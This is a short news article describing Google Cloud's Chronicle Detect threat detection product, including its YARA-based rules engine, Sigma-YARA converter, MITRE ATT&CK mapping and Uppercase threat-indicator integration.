Google Cloud has been proactively working towards securing its own security periphery and providing its customers with a host of solutions that will help in upping their own security fencing. It all began with the acquisition of “Chronicle” in October 2019. Nine months later, it followed up a partnership with Tanium that saw the integration of Tanium’s high-fidelity and real-time security telemetry and Google Cloud Chronicle’s analytics and cloud-scale data capacity. This meant delivering instantaneous search and cyber forensics capability to its customers was now a reality. Following this suit, with increased volumes of new threat vectors coming in every day and with the shortfalls in the legacy security solutions, Google has now launched a new age solution for new-age threats – The Chronicle Detect.
It is often difficult to run multiple rules in parallel and at scale in the legacy systems, which creates latency in response even if a threat is detected. Add to this majority of the analytics tools use a data query language for writing detection rules. This adds to the burden of the person writing them in the first place. Finally, early detections depend on proactive threat intelligence on attacker activity, which many vendors lack. As a result, legacy security tools are unable to detect most modern-day threats.
Chronicle Detect as a Solution
To address these concerns, Google Cloud announced the Chronicle Detect, a threat detection solution built on the capabilities of Google’s security infrastructure to help enterprises identify threats at high speeds and at scale. Chronicle Detect has a data fusion model that pieces all events into a unified timeline, has a rules engine to handle common events and a language for describing complex threat behaviors.
Chronicle Detect has the gen-next rules engine that operates at the speed of search with a regular stream of new rules and indicators added frequently by the Chronicle’s internal research team. It is easier for enterprises to move from legacy security tools to a modern threat detection system like Chronicle Detect because security teams can send their security telemetry to Chronicle at a fixed cost so that diverse, high-value security data can be taken into account for detections. This security data is then made useful by mapping it to a common data model across machines, users, and threat indicators, so that its users can quickly apply powerful detection rules to a unified set of data.
The rules engine makes use of a very flexible and widely used detection language in the world, YARA. This eases the pressure of writing the rules for detection tactics and techniques found in the commonly used MITRE ATT&CK security framework. Additionally, it is observed that many organizations are integrating Sigma-based rules across systems or converting their legacy rules to Sigma for portability. Thus, Chronicle Detect includes a Sigma-YARA converter, which allows porting of rules to and from the platform.
Chronicle Detect has integration with Uppercase as well. Uppercase acts as a directory that provides IOCs, indicators of APTs, and other information related to cybercriminal activities. Thus, this is an add-on privilege for the platform’s customers as they can take advantage of its detection rules and threat indicators.
In Google’s own words this is just the beginning of things to come. With threat actors evolving their techniques every day, Google plans to counter that with a more secure solutions suite offering to its customers.